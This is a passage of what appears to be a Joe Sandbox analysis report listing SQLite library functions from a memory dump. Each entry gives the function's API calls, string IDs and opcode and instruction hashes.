                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: ($string or blob too big$|
                                                                          • API String ID: 632333372-2398534278
                                                                          • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                          • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                          • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                          • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                          Function 6092362D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_stricmp.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6094E8D4), ref: 60923675
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_stricmp
                                                                          • String ID: BINARY
                                                                          • API String ID: 912767213-907554435
                                                                          • Opcode ID: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                          • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                                          • Opcode Fuzzy Hash: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                          • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                                          Function 6096D170 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Protect$Query
                                                                          • String ID: @
                                                                          • API String ID: 3618607426-2766056989
                                                                          • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                          • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                          • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                          • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                          Function 60928335 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                            • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                          • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                          • sqlite3_free.SQLITE3 ref: 609283B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                          • String ID: d
                                                                          • API String ID: 211589378-2564639436
                                                                          • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                          • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                          • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                          • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                          Function 60901184 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                          • API String ID: 1646373207-2713375476
                                                                          • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                          • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                          • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                          • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                          Function 60922538 Relevance: 6.3, APIs: 4, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free
                                                                          • String ID:
                                                                          • API String ID: 2313487548-0
                                                                          • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                          • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                          • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                          • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                          Function 6094D584 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 285COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                          • API String ID: 0-1177837799
                                                                          • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                          • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                          • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                          • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                          Function 6095B7D1 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_leave$sqlite3_logsqlite3_mutex_enter
                                                                          • String ID:
                                                                          • API String ID: 4249760608-0
                                                                          • Opcode ID: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
                                                                          • Instruction ID: 2374180173898b37ca3bb3ba1fa7e33799c7e45bceefb220d1965ad168ba1add
                                                                          • Opcode Fuzzy Hash: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
                                                                          • Instruction Fuzzy Hash: 7F412970A083048BE701DF6AC495B8ABBF6FFA5308F04C46DE8598B355D779D849CB91
                                                                          Function 609292DA Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                          • String ID:
                                                                          • API String ID: 1648232842-0
                                                                          • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                          • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                          • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                          • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                          Function 60961492 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_step.SQLITE3 ref: 609614AB
                                                                          • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                          • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 3429445273-0
                                                                          • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                          • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                          • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                          • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                          Function 6093A57B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                          • String ID:
                                                                          • API String ID: 1035992805-0
                                                                          • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                          • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                          • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                          • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                          Function 609034B2 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                          • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                          • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                          • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1477753154-0
                                                                          • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                          • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                          • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                          • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                          Function 6092A43E Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                          • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 2673540737-0
                                                                          • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                          • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                          • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                          • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                          Function 6092A3C4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                          • String ID:
                                                                          • API String ID: 3526213481-0
                                                                          • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                          • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                          • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                          • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                          Function 60969133 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                          • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                            • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                          • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                            • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                          • sqlite3_step.SQLITE3 ref: 60969197
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 2877408194-0
                                                                          • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                          • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                          • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                          • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                          Function 609296D1 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID:
                                                                          • API String ID: 1163609955-0
                                                                          • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                          • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                          • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                          • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                          Function 60961580 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                          Download Yara Rule
